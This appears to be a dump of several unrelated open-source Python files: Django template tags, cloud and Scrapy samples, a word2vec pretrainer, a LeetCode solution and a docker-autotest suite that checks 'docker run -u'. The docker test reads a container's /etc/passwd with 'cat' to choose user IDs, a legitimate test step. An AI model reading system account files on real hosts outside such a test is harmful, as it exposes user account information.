return IfChangedNode(nodelist_true, nodelist_false, *values)
@register.tag
def ssi(parser, token):
"""
Outputs the contents of a given file into the page.
Like a simple "include" tag, the ``ssi`` tag includes the contents
of another file -- which must be specified using an absolute path --
in the current page::
{% ssi "/home/html/ljworld.com/includes/right_generic.html" %}
If the optional "parsed" parameter is given, the contents of the included
file are evaluated as template code, with the current context::
{% ssi "/home/html/ljworld.com/includes/right_generic.html" parsed %}
"""
bits = token.split_contents()
parsed = False
if len(bits) not in (2, 3):
raise TemplateSyntaxError("'ssi' tag takes one argument: the path to"
" the file to be included")
if len(bits) == 3:
if bits[2] == 'parsed':
parsed = True
else:
raise TemplateSyntaxError("Second (optional) argument to %s tag"
" must be 'parsed'" % bits[0])
filepath = parser.compile_filter(bits[1])
return SsiNode(filepath, parsed)
@register.tag
def load(parser, token):
"""
Loads a custom template tag set.
For example, to load the template tags in
``django/templatetags/news/photos.py``::
{% load news.photos %}
Can also be used to load an individual tag/filter from
a library::
{% load byline from news %}
"""
    # token.split_contents() isn't useful here because this tag doesn't accept variables as arguments
bits = token.contents.split()
if len(bits) >= 4 and bits[-2] == "from":
try:
taglib = bits[-1]
lib = get_library(taglib)
except InvalidTemplateLibrary as e:
raise TemplateSyntaxError("'%s' is not a valid tag library: %s" %
(taglib, e))
else:
temp_lib = Library()
for name in bits[1:-2]:
if name in lib.tags:
temp_lib.tags[name] = lib.tags[name]
# a name could be a tag *and* a filter, so check for both
if name in lib.filters:
temp_lib.filters[name] = lib.filters[name]
elif name in lib.filters:
temp_lib.filters[name] = lib.filters[name]
else:
raise TemplateSyntaxError("'%s' is not a valid tag or filter in tag library '%s'" %
(name, taglib))
parser.add_library(temp_lib)
else:
for taglib in bits[1:]:
# add the library to the parser
try:
lib = get_library(taglib)
parser.add_library(lib)
except InvalidTemplateLibrary as e:
raise TemplateSyntaxError("'%s' is not a valid tag library: %s" %
(taglib, e))
return LoadNode()
@register.tag
def now(parser, token):
"""
Displays the date, formatted according to the given string.
Uses the same format as PHP's ``date()`` function; see http://php.net/date
for all the possible values.
Sample usage::
It is {% now "jS F Y H:i" %}
"""
bits = token.split_contents()
if len(bits) != 2:
raise TemplateSyntaxError("'now' statement takes one argument")
format_string = bits[1][1:-1]
return NowNode(format_string)
@register.tag
def regroup(parser, token):
"""
Regroups a list of alike objects by a common attribute.
This complex tag is best illustrated by use of an example: say that
``people`` is a list of ``Person`` objects that have ``first_name``,
``last_name``, and ``gender`` attributes, and you'd like to display a list
that looks like:
* Male:
* George Bush
* Bill Clinton
* Female:
* Margaret Thatcher
* Condoleezza Rice
* Unknown:
* Pat Smith
The following snippet of template code would accomplish this dubious task::
{% regroup people by gender as grouped %}
<ul>
{% for group in grouped %}
<li>{{ group.grouper }}
<ul>
{% for item in group.list %}
<li>{{ item }}</li>
{% endfor %}
</ul>
{% endfor %}
</ul>
As you can see, ``{% regroup %}`` populates a variable with a list of
objects with ``grouper`` and ``list`` attributes. ``grouper`` contains the
item that was grouped by; ``list`` contains the list of objects that share
that ``grouper``. In this case, ``grouper`` would be ``Male``, ``Female``
and ``Unknown``, and ``list`` is the list of people with those genders.
Note that ``{% regroup %}`` does not work when the list to be grouped is not
sorted by the key you are grouping by! This means that if your list of
people was not sorted by gender, you'd need to make sure it is sorted
before using it, i.e.::
{% regroup people|dictsort:"gender" by gender as grouped %}
"""
bits = token.split_contents()
if len(bits) != 6:
raise TemplateSyntaxError("'regroup' tag takes five arguments")
target = parser.compile_filter(bits[1])
if bits[2] != 'by':
raise TemplateSyntaxError("second argument to 'regroup' tag must be 'by'")
if bits[4] != 'as':
raise TemplateSyntaxError("next-to-last argument to 'regroup' tag must"
" be 'as'")
var_name = bits[5]
# RegroupNode will take each item in 'target', put it in the context under
# 'var_name', evaluate 'var_name'.'expression' in the current context, and
# group by the resulting value. After all items are processed, it will
# save the final result in the context under 'var_name', thus clearing the
# temporary values. This hack is necessary because the template engine
# doesn't provide a context-aware equivalent of Python's getattr.
expression = parser.compile_filter(var_name +
VARIABLE_ATTRIBUTE_SEPARATOR +
bits[3])
return RegroupNode(target, expression, var_name)
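# Editor's sketch (illustrative only): sorting and regrouping in one expression,
# as recommended in the docstring above; the data shape is an assumption.
def _example_regroup():  # pragma: no cover - documentation aid
    from django.template import Context, Template
    t = Template('{% regroup people|dictsort:"gender" by gender as grouped %}'
                 '{% for g in grouped %}{{ g.grouper }}:{{ g.list|length }} {% endfor %}')
    people = [{'gender': 'F'}, {'gender': 'M'}, {'gender': 'F'}]
    return t.render(Context({'people': people}))  # -> "F:2 M:1 "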
@register.tag
def spaceless(parser, token):
"""
Removes whitespace between HTML tags, including tab and newline characters.
Example usage::
{% spaceless %}
<p>
<a href="foo/">Foo</a>
</p>
{% endspaceless %}
This example would return this HTML::
<p><a href="foo/">Foo</a></p>
Only space between *tags* is normalized -- not space between tags and text.
In this example, the space around ``Hello`` won't be stripped::
{% spaceless %}
<strong>
Hello
</strong>
{% endspaceless %}
"""
nodelist = parser.parse(('endspaceless',))
parser.delete_first_token()
return SpacelessNode(nodelist)
@register.tag
def templatetag(parser, token):
"""
Outputs one of the bits used to compose template tags.
Since the template system has no concept of "escaping", to display one of
the bits used in template tags, you must use the ``{% templatetag %}`` tag.
The argument tells which template bit to output:
================== =======
Argument Outputs
================== =======
``openblock`` ``{%``
``closeblock`` ``%}``
``openvariable`` ``{{``
``closevariable`` ``}}``
``openbrace`` ``{``
``closebrace`` ``}``
``opencomment`` ``{#``
``closecomment`` ``#}``
================== =======
"""
    # token.split_contents() isn't useful here because this tag doesn't accept variables as arguments
bits = token.contents.split()
if len(bits) != 2:
raise TemplateSyntaxError("'templatetag' statement takes one argument")
tag = bits[1]
if tag not in TemplateTagNode.mapping:
raise TemplateSyntaxError("Invalid templatetag argument: '%s'."
" Must be one of: %s" %
(tag, list(TemplateTagNode.mapping)))
return TemplateTagNode(tag)
@register.tag
def url(parser, token):
"""
Returns an absolute URL matching given view with its parameters.
This is a way to define links that aren't tied to a particular URL
configuration::
{% url "path.to.some_view" arg1 arg2 %}
or
{% url "path.to.some_view" name1=value1 name2=value2 %}
The first argument is a path to a view. It can be an absolute Python path
or just ``app_name.view_name`` without the project name if the view is
located inside the project.
Other arguments are space-separated values that will be filled in place of
positional and keyword arguments in the URL. Don't mix positional and
keyword arguments.
All arguments for the URL should be present.
For example if you have a view ``app_name.client`` taking client's id and
the corresponding line in a URLconf looks like this::
('^client/(\d+)/$', 'app_name.client')
and this app's URLconf is included into the project's URLconf under some
path::
('^clients/', include('project_name.app_name.urls'))
then in a template you can create a link for a certain client like this::
{% url "app_name.client" client.id %}
The URL will look like ``/clients/client/123/``.
The first argument can also be a named URL instead of the Python path to
the view callable. For example if the URLconf entry looks like this::
url('^client/(\d+)/$', name='client-detail-view')
then in the template you can use::
{% url "client-detail-view" client.id %}
There is even another possible value type for the first argument. It can be
the name of a template variable that will be evaluated to obtain the view
name or the URL name, e.g.::
{% with view_path="app_name.client" %}
{% url view_path client.id %}
{% endwith %}
or,
{% with url_name="client-detail-view" %}
{% url url_name client.id %}
{% endwith %}
"""
bits = token.split_contents()
if len(bits) < 2:
raise TemplateSyntaxError("'%s' takes at least one argument"
" (path to a view)" % bits[0])
try:
viewname = parser.compile_filter(bits[1])
except TemplateSyntaxError as exc:
exc.args = (exc.args[0] + ". "
"The syntax of 'url' changed in Django 1.5, see the docs."),
raise
args = []
kwargs = {}
asvar = None
bits = bits[2:]
if len(bits) >= 2 and bits[-2] == 'as':
asvar = bits[-1]
bits = bits[:-2]
if len(bits):
for bit in bits:
match = kwarg_re.match(bit)
if not match:
raise TemplateSyntaxError("Malformed arguments to url tag")
name, value = match.groups()
if name:
kwargs[name] = parser.compile_filter(value)
else:
args.append(parser.compile_filter(value))
return URLNode(viewname, args, kwargs, asvar)
@register.tag
def verbatim(parser, token):
"""
Stops the template engine from rendering the contents of this block tag.
Usage::
{% verbatim %}
{% don't process this %}
{% endverbatim %}
You can also designate a specific closing tag block (allowing the
unrendered use of ``{% endverbatim %}``)::
{% verbatim myblock %}
...
{% endverbatim myblock %}
"""
nodelist = parser.parse(('endverbatim',))
parser.delete_first_token()
return VerbatimNode(nodelist.render(Context()))
@register.tag
def widthratio(parser, token):
"""
For creating bar charts and such, this tag calculates the ratio of a given
value to a maximum value, and then applies that ratio to a constant.
For example::
<img src='bar.gif' height='10' width='{% widthratio this_value max_value max_width %}' />
If ``this_value`` is 175, ``max_value`` is 200, and ``max_width`` is 100,
the image in the above example will be 88 pixels wide
(because 175/200 = .875; .875 * 100 = 87.5 which is rounded up to 88).
"""
bits = token.split_contents()
if len(bits) != 4:
raise TemplateSyntaxError("widthratio takes three arguments")
tag, this_value_expr, max_value_expr, max_width = bits
return WidthRatioNode(parser.compile_filter(this_value_expr),
parser.compile_filter(max_value_expr),
parser.compile_filter(max_width))
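# Editor's sketch (illustrative only): the docstring example rendered through
# the Template API; 175/200 * 100 = 87.5, which rounds up to 88.
def _example_widthratio():  # pragma: no cover - documentation aid
    from django.template import Context, Template
    t = Template('{% widthratio this_value max_value max_width %}')
    return t.render(Context({'this_value': 175, 'max_value': 200,
                             'max_width': 100}))  # -> "88"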
@register.tag('with')
def do_with(parser, token):
"""
Adds one or more values to the context (inside of this block) for caching
and easy access.
For example::
{% with total=person.some_sql_method %}
{{ total }} object{{ total|pluralize }}
{% endwith %}
Multiple values can be added to the context::
{% with foo=1 bar=2 %}
...
{% endwith %}
The legacy format of ``{% with person.some_sql_method as total %}`` is
still accepted.
"""
bits = token.split_contents()
remaining_bits = bits[1:]
extra_context = token_kwargs(remaining_bits, parser, support_legacy=True)
if not extra_context:
raise TemplateSyntaxError("%r expected at least one variable "
"assignment" % bits[0])
if remaining_bits:
raise TemplateSyntaxError("%r received an invalid token: %r" %
(bits[0], remaining_bits[0]))
nodelist = parser.parse(('endwith',))
parser.delete_first_token()
return WithNode(None, None, nodelist, extra_context=extra_context)
| jgeskens/django | django/template/defaulttags.py | Python | bsd-3-clause | 50,082 |
#!/usr/bin/env python
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This application demonstrates how to detect labels from a video
based on the image content with the Google Cloud Video Intelligence
API.
For more information, check out the documentation at
https://cloud.google.com/videointelligence/docs.
Usage Example:
python labels.py gs://cloud-ml-sandbox/video/chicago.mp4
"""
# [START video_label_tutorial]
# [START video_label_tutorial_imports]
import argparse
from google.cloud import videointelligence
# [END video_label_tutorial_imports]
def analyze_labels(path):
""" Detects labels given a GCS path. """
# [START video_label_tutorial_construct_request]
video_client = videointelligence.VideoIntelligenceServiceClient()
features = [videointelligence.Feature.LABEL_DETECTION]
operation = video_client.annotate_video(
request={"features": features, "input_uri": path}
)
# [END video_label_tutorial_construct_request]
print("\nProcessing video for label annotations:")
# [START video_label_tutorial_check_operation]
result = operation.result(timeout=90)
print("\nFinished processing.")
# [END video_label_tutorial_check_operation]
# [START video_label_tutorial_parse_response]
segment_labels = result.annotation_results[0].segment_label_annotations
for i, segment_label in enumerate(segment_labels):
print("Video label description: {}".format(segment_label.entity.description))
for category_entity in segment_label.category_entities:
print(
"\tLabel category description: {}".format(category_entity.description)
)
for i, segment in enumerate(segment_label.segments):
start_time = (
segment.segment.start_time_offset.seconds
+ segment.segment.start_time_offset.microseconds / 1e6
)
end_time = (
segment.segment.end_time_offset.seconds
+ segment.segment.end_time_offset.microseconds / 1e6
)
positions = "{}s to {}s".format(start_time, end_time)
confidence = segment.confidence
print("\tSegment {}: {}".format(i, positions))
print("\tConfidence: {}".format(confidence))
print("\n")
# [END video_label_tutorial_parse_response]
if __name__ == "__main__":
# [START video_label_tutorial_run_application]
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("path", help="GCS file path for label detection.")
args = parser.parse_args()
analyze_labels(args.path)
# [END video_label_tutorial_run_application]
# [END video_label_tutorial]
| googleapis/python-videointelligence | samples/labels/labels.py | Python | apache-2.0 | 3,327 |
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from pymongo import MongoClient
class MongoPipeline(object):
client = MongoClient('localhost', 27017)
db = client.cigrasp
    def process_item(self, item, spider):
        # insert_one is the modern PyMongo API (collection.insert was removed
        # in PyMongo 3.0).
        self.db.output.insert_one(dict(item))
        return item
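# Editor's sketch: enabling this pipeline in the project's settings.py; the
# dotted path and priority are assumptions for a project package named "undp".
#
#   ITEM_PIPELINES = {'undp.pipelines.MongoPipeline': 300}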
| digitalmethodsinitiative/emaps | code_project_7,8,9/undp/pipelines.py | Python | apache-2.0 | 403 |
import ctypes
class MPQFileData(ctypes.Structure):
_fields_ = [
('filename', ctypes.c_char * 1024),
('plainpath', ctypes.c_char_p),
('hashindex', ctypes.c_int, 32),
('blockindex', ctypes.c_int, 32),
('filesize', ctypes.c_int, 32),
('fileflags', ctypes.c_int, 32),
('compsize', ctypes.c_int, 32),
('filetimelo', ctypes.c_int, 32),
('filetimehi', ctypes.c_int, 32),
('locale', ctypes.c_int, 32)
]
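# Editor's sketch: instantiating the structure and checking its binary size;
# the filename below is illustrative.
def _example_mpqfiledata():  # pragma: no cover - documentation aid
    entry = MPQFileData()
    entry.filename = b"war3map.j"  # c_char arrays accept byte strings
    return ctypes.sizeof(entry)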
| srounet/pystormlib | pystormlib/structure.py | Python | mit | 485 |
#!/usr/bin/env python
import sys
import os
import tempfile
import glob
import filecmp
import time
from argparse import ArgumentParser
usage = "%(prog)s [options] program_to_test"
parser = ArgumentParser(usage=usage, description="""Testrunner for programming puzzles: runs a program against each
.in-file and compares its output against the corresponding .ans-file""")
parser.add_argument("-v", "--verbose", action="store_true", help="Be verbose", required=False, default=False)
parser.add_argument("-e", "--executor", dest="executor", default="", help="Execute the program with this executor (ex: java or python)")
parser.add_argument("-d", "--directory", dest="directory", default="", help="""The directory where test files with extensions .in
and .ans can be found (default is a a folder named test placed as
a subfolder to the folder where the program is located)""")
parser.add_argument("program")
args = parser.parse_args()
program = args.program
if program[0] != '.':
program = "./" + program
# Fail fast if the program file does not exist.
f = open(program)
f.close()
program_path = os.path.dirname(program)
if args.directory:
test_search_path = "%s/*.in" % args.directory
else:
test_search_path = "%s/test/*.in" % program_path
success = True
tests_found = False
try:
for test_file in glob.glob(test_search_path):
tests_found = True
start = time.time()
os.system(args.executor + " " + program + "<" + test_file + " > answer.tmp")
end = time.time()
test_exp_file = test_file.replace(".in", ".ans")
if not filecmp.cmp(test_exp_file, "answer.tmp"):
success = False
print(test_file + ", FAILED")
elif args.verbose:
print(test_file + ", succes")
if args.verbose:
print(test_file + ", execution time = " + str(end - start))
finally:
if os.path.isfile("answer.tmp"):
os.remove("answer.tmp")
if not tests_found:
print("No test files found")
elif success:
print("Success")
else:
print("Failed (%s)" % program)
| plilja/algolib | util/checksol.py | Python | apache-2.0 | 2,044 |
class Redraw:
""" Invalidate bitmasks. """
Nothing = 0
Cursor = 1
Borders = 2
Panes = 4
StatusBar = 16
ClearFirst = 32
All = Cursor | Borders | Panes | StatusBar | ClearFirst
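# Editor's sketch: typical bitmask usage -- combine flags with |, test with &.
def _example_redraw_usage():  # pragma: no cover - documentation aid
    needed = Redraw.Cursor | Redraw.StatusBar
    return bool(needed & Redraw.StatusBar)  # -> True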
| jonathanslenders/python-vterm | libpymux/invalidate.py | Python | bsd-2-clause | 210 |
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 ADHOC SA (http://www.adhoc.com.ar)
# All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Product Stock Location',
'version': '1.0',
'category': 'Sales Management',
'sequence': 14,
    'summary': 'Sales, Product, Category, Classification',
'description': """
Product Stock Location
======================
""",
'author': 'ADHOC SA',
'website': 'www.adhoc.com.ar',
'images': [
],
'depends': [
'stock',
],
'data': [
'product_view.xml',
],
'demo': [
],
'test': [
],
'installable': True,
'auto_install': False,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| maljac/odoo-addons | product_stock_location/__openerp__.py | Python | agpl-3.0 | 1,577 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0008_auto_20150907_0317'),
]
operations = [
migrations.RenameField(
model_name='experiment',
old_name='source_code_repository',
new_name='repository',
),
]
| niekas/dakis | dakis/core/migrations/0009_auto_20150907_0553.py | Python | agpl-3.0 | 408 |
#!usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
from collections import Counter
from operator import itemgetter
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
from gensim.models import Word2Vec
from sklearn.cluster import AgglomerativeClustering
from sklearn.manifold import TSNE
class SentenceIterator:
def __init__(self, tokens, sentence_len=100):
self.sentence_len = sentence_len
self.tokens = [t.lower() for t in tokens]
self.idxs = []
start_idx, end_idx = 0, self.sentence_len
while end_idx < len(self.tokens):
self.idxs.append((start_idx, end_idx))
start_idx += self.sentence_len
end_idx += self.sentence_len
def __iter__(self):
for start_idx, end_idx in self.idxs:
yield self.tokens[start_idx : end_idx]
class Pretrainer:
def __init__(self, nb_left_tokens, nb_right_tokens,
sentence_len=100, window=5,
minimum_count=2, size=300, nb_mfi=500,
nb_workers=10, nb_negative=5,
):
self.nb_left_tokens = nb_left_tokens
self.nb_right_tokens = nb_right_tokens
self.size = size
self.nb_mfi = nb_mfi
self.window = window
self.minimum_count = minimum_count
self.nb_workers = nb_workers
self.nb_negative = nb_negative
def fit(self, tokens):
# get most frequent items for plotting:
tokens = [t.lower() for t in tokens]
self.mfi = [t for t,_ in Counter(tokens).most_common(self.nb_mfi)]
self.sentence_iterator = SentenceIterator(tokens=tokens)
# train embeddings:
self.w2v_model = Word2Vec(self.sentence_iterator,
window=self.window,
min_count=self.minimum_count,
size=self.size,
workers=self.nb_workers,
negative=self.nb_negative)
self.plot_mfi()
self.most_similar()
# build an index of the train tokens
# which occur at least min_count times:
self.token_idx = {'<UNK>': 0}
for k, v in Counter(tokens).items():
if v >= self.minimum_count:
self.token_idx[k] = len(self.token_idx)
# create an ordered vocab:
self.train_token_vocab = [k for k, v in sorted(self.token_idx.items(),\
key=itemgetter(1))]
self.pretrained_embeddings = self.get_weights(self.train_token_vocab)
return self
def get_weights(self, vocab):
unk = np.zeros(self.size)
weights = []
for w in vocab:
try:
weights.append(self.w2v_model[w])
except KeyError:
weights.append(unk)
return [np.asarray(weights, dtype='float32')]
    def transform(self, tokens):
        """Vectorize each token into zero-padded arrays of left/right context indices."""
context_ints = []
tokens = [t.lower() for t in tokens]
for curr_idx, token in enumerate(tokens):
ints = []
# vectorize left context:
left_context_tokens = [tokens[curr_idx-(t+1)]\
for t in range(self.nb_left_tokens)\
if curr_idx-(t+1) >= 0][::-1]
idxs = []
if left_context_tokens:
idxs = [self.token_idx[t] if t in self.token_idx else 0 \
for t in left_context_tokens]
while len(idxs) < self.nb_left_tokens:
idxs = [0] + idxs
ints.extend(idxs)
# vectorize right context
right_context_tokens = [tokens[curr_idx+(t+1)]\
for t in range(self.nb_right_tokens)\
if curr_idx+(t+1) < len(tokens)]
idxs = []
if right_context_tokens:
idxs = [self.token_idx[t] if t in self.token_idx else 0 \
for t in right_context_tokens]
while len(idxs) < self.nb_right_tokens:
idxs.append(0)
ints.extend(idxs)
context_ints.append(ints)
return np.asarray(context_ints, dtype='int32')
def plot_mfi(self, outputfile='embeddings.pdf', nb_clusters=8, weights='NA'):
# collect embeddings for mfi:
X = np.asarray([self.w2v_model[w] for w in self.mfi \
if w in self.w2v_model], dtype='float32')
# dimension reduction:
tsne = TSNE(n_components=2)
coor = tsne.fit_transform(X) # unsparsify
plt.clf()
sns.set_style('dark')
sns.plt.rcParams['axes.linewidth'] = 0.4
fig, ax1 = sns.plt.subplots()
labels = self.mfi
# first plot slices:
x1, x2 = coor[:,0], coor[:,1]
ax1.scatter(x1, x2, 100, edgecolors='none', facecolors='none')
# clustering on top (add some colouring):
clustering = AgglomerativeClustering(linkage='ward',
affinity='euclidean', n_clusters=nb_clusters)
clustering.fit(coor)
# add names:
for x, y, name, cluster_label in zip(x1, x2, labels, clustering.labels_):
ax1.text(x, y, name, ha='center', va="center",
color=plt.cm.spectral(cluster_label / 10.),
fontdict={'family': 'Arial', 'size': 8})
# control aesthetics:
ax1.set_xlabel('')
ax1.set_ylabel('')
ax1.set_xticklabels([])
ax1.set_xticks([])
ax1.set_yticklabels([])
ax1.set_yticks([])
sns.plt.savefig(outputfile, bbox_inches=0)
def most_similar(self, nb_neighbors=5,
words=['doet', 'goet', 'ende', 'mach', 'gode'],
outputfile='neighbours.txt'):
with open(outputfile, 'w') as f:
for w in words:
try:
neighbors = ' - '.join([v for v,_ in self.w2v_model.most_similar(w)])
f.write(' '.join((w, '>', neighbors))+'\n')
f.write(':::::::::::::::::\n')
except KeyError:
pass
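# Editor's sketch (assumed usage): fit embeddings on a token list, then map
# each token to a fixed-width window of vocabulary indices.
#
#   pre = Pretrainer(nb_left_tokens=2, nb_right_tokens=2, minimum_count=1)
#   pre.fit(tokens)           # also writes embeddings.pdf and neighbours.txt
#   X = pre.transform(tokens) # -> int32 array of shape (len(tokens), 4)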
| mikekestemont/pandora | pandora/pretraining.py | Python | mit | 6,321 |
import unittest
import utils
from tree import TreeNode
# O(n) time. O(log(n)) space. Recursive post-order DFS.
class Solution:
def pruneTree(self, root):
"""
:type root: TreeNode
:rtype: TreeNode
"""
def prune(node):
if not node:
return True
left_pruned = prune(node.left)
if left_pruned:
node.left = None
right_pruned = prune(node.right)
if right_pruned:
node.right = None
return left_pruned and right_pruned and node.val == 0
return None if prune(root) else root
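# Editor's note: prune() returns True when a subtree contains no 1s, letting the
# parent drop it. E.g. [1, null, 0, 0, 1] prunes to [1, null, 0, null, 1]: the
# all-zero left leaf is removed, while the 0-node that keeps a 1-child survives.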
class Test(unittest.TestCase):
def test(self):
cases = utils.load_test_json(__file__).test_cases
for case in cases:
args = str(case.args)
root = TreeNode.from_array(case.args.root)
actual = Solution().pruneTree(root)
actual = TreeNode.to_array_static(actual)
self.assertEqual(case.expected, actual, msg=args)
if __name__ == '__main__':
unittest.main()
| chrisxue815/leetcode_python | problems/test_0814.py | Python | unlicense | 1,085 |
r"""
Summary
----------
This test checks correctness of docker run -u ...
Operational Summary
--------------------
1. get container's /etc/passwd
2. generate a uid which suits the test's needs (non-existing, existing name, existing uid, ...)
3. execute docker run -u ... echo $UID:$GID; whoami
4. check results (pass/fail/details)
"""
from autotest.client import utils
from dockertest import config, xceptions, subtest
from dockertest.containers import DockerContainers
from dockertest.dockercmd import DockerCmd
from dockertest.images import DockerImage
from dockertest.output import OutputGood
class run_user(subtest.SubSubtestCaller):
""" Subtest caller """
def _get_passwd_from_container(self):
"""
Get /etc/passwd from container (it's used to generate correct uids)
"""
name = self.stuff['dc'].get_unique_name("initialization", length=4)
self.stuff['container'] = name
subargs = ['--rm', '--interactive']
subargs.append("--name %s" % name)
fin = DockerImage.full_name_from_defaults(self.config)
subargs.append(fin)
subargs.append("cat /etc/passwd")
cmd = DockerCmd(self, 'run', subargs, verbose=False)
result = cmd.execute()
self.failif(result.exit_status != 0,
"Failed to get container's /etc/passwd. Exit status is !0"
"\n%s" % result)
OutputGood(result)
return result.stdout
def initialize(self):
super(run_user, self).initialize()
self.stuff['dc'] = DockerContainers(self)
self.stuff['passwd'] = self._get_passwd_from_container()
def cleanup(self):
"""
Cleanup the container
"""
super(run_user, self).cleanup()
if self.config['remove_after_test']:
dc = DockerContainers(self)
dc.clean_all([self.stuff.get("container")])
class run_user_base(subtest.SubSubtest):
""" Base class """
def _init_container(self, subargs, cmd):
"""
Starts container
"""
name = self.sub_stuff['dc'].get_unique_name()
self.sub_stuff['container'] = name
subargs.append("--name %s" % name)
fin = DockerImage.full_name_from_defaults(self.config)
subargs.append(fin)
subargs.append("bash")
subargs.append("-c")
subargs.append(cmd)
self.sub_stuff['cmd'] = DockerCmd(self, 'run', subargs, verbose=False)
    def _init_test_dependent(self):
"""
Override this with your desired test setup.
"""
self.sub_stuff['execution_failure'] = None
self.sub_stuff['uid_check'] = None
self.sub_stuff['whoami_check'] = None
self.sub_stuff['subargs'] = None
        raise NotImplementedError("Override this method in your test!")
def initialize(self):
"""
Runs one container
"""
super(run_user_base, self).initialize()
# Prepare a container
config.none_if_empty(self.config)
self.sub_stuff['dc'] = DockerContainers(self)
        self._init_test_dependent()
self._init_container(self.sub_stuff['subargs'],
self.config['exec_cmd'])
def run_once(self):
"""
Execute docker and store the results
"""
super(run_user_base, self).run_once()
self.sub_stuff['result'] = self.sub_stuff['cmd'].execute()
def postprocess(self):
super(run_user_base, self).postprocess()
# Exit status
if self.sub_stuff['execution_failure']:
self._postprocess_bad()
else:
self._postprocess_good()
def _postprocess_bad(self):
"""
Check that container execution failed with correct message
"""
result = self.sub_stuff['result']
        self.failif(result.exit_status == 0, "Container's exit status is "
                    "0, although it should have failed:\n%s"
                    % result)
output = (str(result.stdout) + str(result.stderr))
self.failif((self.sub_stuff['execution_failure']
not in output),
"Expected failure message '%s' is not in the "
"container's output:\n%s"
% (self.sub_stuff['execution_failure'], output))
def _postprocess_good(self):
"""
Check that container executed correctly and that output is as expected
"""
result = self.sub_stuff['result']
OutputGood(result)
self.failif(result.exit_status != 0,
"Container's exit status is !0 although it should pass"
":\n%s" % result)
output = (str(result.stdout) + str(result.stderr))
self.failif(self.sub_stuff['uid_check'] not in output, "UID "
"check line '%s' not present in the container output:\n%s"
% (self.sub_stuff['uid_check'], result))
self.failif(self.sub_stuff['whoami_check'] not in output,
"whoami check line '%s' not present in the container "
"output:\n%s" % (self.sub_stuff['whoami_check'], result))
def cleanup(self):
"""
Cleanup the container
"""
super(run_user_base, self).cleanup()
if self.config['remove_after_test']:
dc = DockerContainers(self)
dc.clean_all([self.sub_stuff.get("container")])
class default(run_user_base):
"""
Doesn't use "-u" and expects the default user to be root::0
"""
    def _init_test_dependent(self):
self.sub_stuff['execution_failure'] = False
self.sub_stuff['uid_check'] = "UIDCHECK: 0:"
self.sub_stuff['whoami_check'] = "WHOAMICHECK: root"
self.sub_stuff['subargs'] = ['--rm', '--interactive']
class named_user(run_user_base):
"""
Finds any user but root existing on container and uses it by name
"""
    def _init_test_dependent(self):
user = None
for line in self.parent_subtest.stuff['passwd'].splitlines():
line = line.strip()
if not line or line.startswith('root') or line.startswith('#'):
continue
user, _, uid, _ = line.split(':', 3)
break
if not user:
msg = ("This container's image doesn't contain passwd with "
"multiple users, unable to execute this test\n%s"
% self.parent_subtest.stuff['passwd'])
raise xceptions.DockerTestNAError(msg)
self.sub_stuff['execution_failure'] = False
self.sub_stuff['uid_check'] = "UIDCHECK: %s:" % uid
self.sub_stuff['whoami_check'] = "WHOAMICHECK: %s" % user
self.sub_stuff['subargs'] = ['--rm', '--interactive',
'--user=%s' % user]
class num_user(run_user_base):
"""
Finds any user but root existing on container and uses it by uid
"""
    def _init_test_dependent(self):
user = None
for line in self.parent_subtest.stuff['passwd'].splitlines():
line = line.strip()
if not line or line.startswith('root') or line.startswith('#'):
continue
user, _, uid, _ = line.split(':', 3)
break
if not user:
msg = ("This container's image doesn't contain passwd with "
"multiple users, unable to execute this test\n%s"
% self.parent_subtest.stuff['passwd'])
raise xceptions.DockerTestNAError(msg)
self.sub_stuff['execution_failure'] = False
self.sub_stuff['uid_check'] = "UIDCHECK: %s:" % uid
self.sub_stuff['whoami_check'] = "WHOAMICHECK: %s" % user
self.sub_stuff['subargs'] = ['--rm', '--interactive',
'--user=%s' % uid]
class bad_user(run_user_base):
"""
Generates user name which doesn't exist in containers passwd
"""
    def _init_test_dependent(self):
users = []
for line in self.parent_subtest.stuff['passwd'].splitlines():
line = line.strip()
try:
users.append(line.split(':', 1)[0])
except IndexError:
pass
user = utils.get_unique_name(lambda name: name not in users, "user",
length=6)
self.sub_stuff['execution_failure'] = "Unable to find user %s" % user
self.sub_stuff['subargs'] = ['--rm', '--interactive',
'--user=%s' % user]
class bad_number(run_user_base):
"""
Generates user id which doesn't exist in containers passwd
(it should start, print correct uid, but whoami should fail)
"""
    def _init_test_dependent(self):
uid = False
uids = []
for line in self.parent_subtest.stuff['passwd'].splitlines():
line = line.strip()
try:
uids.append(int(line.split(':', 3)[2]))
except (IndexError, TypeError):
pass
for i in xrange(1, 2147483647):
if i not in uids:
uid = i
break
if uid is False:
msg = ("This container's image passwd occupies all uids. Unable to"
" execute this test\n%s"
% self.parent_subtest.stuff['passwd'])
raise xceptions.DockerTestNAError(msg)
self.sub_stuff['execution_failure'] = False
self.sub_stuff['uid_check'] = "UIDCHECK: %s:" % uid
self.sub_stuff['whoami_check'] = ("whoami: cannot find name for user "
"ID %s" % uid)
self.sub_stuff['subargs'] = ['--rm', '--interactive',
'--user=%s' % uid]
class too_high_number(run_user_base):
"""
